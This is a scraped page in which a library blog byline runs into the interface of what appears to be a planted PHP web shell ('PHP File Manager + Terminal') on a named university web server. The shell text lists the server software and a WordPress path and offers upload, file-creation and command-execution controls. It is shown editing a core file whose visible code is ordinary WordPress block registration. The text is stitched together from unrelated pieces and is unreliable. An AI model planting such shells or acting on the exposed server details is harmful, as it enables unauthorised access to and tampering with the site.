Looking for something? Use OneSearch! Posted on January 23, 2020 (February 3, 2025) by Rebecca Hyams PHP File Manager + Terminal PHP File Manager + TerminalServer: www.bmcc.cuny.eduSoftware: Apache/2.4.62 (Debian)Current directory: //var/www/html/sfac/wp-includes/blocks Upload Create File Create Folder Execute Editing: /var/www/html/sfac/wp-includes/blocks/query.php<?php /** * Server-side rendering of the `core/query` block. * * @package WordPress */ /** * Registers the `core/query` block on the server. */ function register_block_core_query() { register_block_type_from_metadata( __DIR__ . '/query' ); } add_action( 'init', 'register_block_core_query' ); Save